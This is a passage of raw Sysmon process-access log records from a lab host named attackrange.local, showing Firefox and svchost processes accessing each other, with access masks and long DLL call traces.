Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bad707|C:\Program Files\Mozilla Firefox\xul.dll+2b92852|C:\Program Files\Mozilla Firefox\xul.dll+1976bf6|C:\Program Files\Mozilla Firefox\xul.dll+275f52|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+304f9e5|C:\Program Files\Mozilla Firefox\xul.dll+61ab4b|C:\Program Files\Mozilla Firefox\xul.dll+3b2ff11|C:\Program Files\Mozilla Firefox\xul.dll+61f1d2|C:\Program Files\Mozilla Firefox\xul.dll+18570fb|C:\Program Files\Mozilla Firefox\xul.dll+18594cb|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24 10341000x800000000000000016824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+1528d12|C:\Program Files\Mozilla Firefox\xul.dll+1528bf3|C:\Program Files\Mozilla Firefox\xul.dll+160519f|C:\Program Files\Mozilla Firefox\xul.dll+160494c|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+5e2afd|C:\Program Files\Mozilla Firefox\xul.dll+228e466|C:\Program Files\Mozilla Firefox\xul.dll+1d92e71|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+2b830e|C:\Program Files\Mozilla Firefox\xul.dll+324f98|C:\Program Files\Mozilla Firefox\xul.dll+32852c 10341000x800000000000000016823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+168c41e|C:\Program Files\Mozilla Firefox\xul.dll+14ca5ba|C:\Program Files\Mozilla Firefox\xul.dll+14c9dfb|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+14b9f41|C:\Program Files\Mozilla Firefox\xul.dll+160601d|C:\Program Files\Mozilla Firefox\xul.dll+2280350|C:\Program Files\Mozilla Firefox\xul.dll+227fdb4|C:\Program Files\Mozilla Firefox\xul.dll+228e12d|C:\Program Files\Mozilla Firefox\xul.dll+1d92e71|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+2b830e 10341000x800000000000000016822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+14b9f41|C:\Program Files\Mozilla Firefox\xul.dll+160601d|C:\Program Files\Mozilla Firefox\xul.dll+2280350|C:\Program Files\Mozilla Firefox\xul.dll+227fdb4|C:\Program Files\Mozilla Firefox\xul.dll+228e12d|C:\Program Files\Mozilla Firefox\xul.dll+1d92e71|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+2b830e 10341000x800000000000000016821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.505{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10d2a99|C:\Program Files\Mozilla Firefox\xul.dll+e9b8a2|C:\Program Files\Mozilla Firefox\xul.dll+a7f24a|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9|C:\Program Files\Mozilla Firefox\xul.dll+3cbc63a|C:\Program Files\Mozilla Firefox\xul.dll+3cbcd09|C:\Program Files\Mozilla Firefox\xul.dll+3e1a140 10341000x800000000000000016818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.489{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla 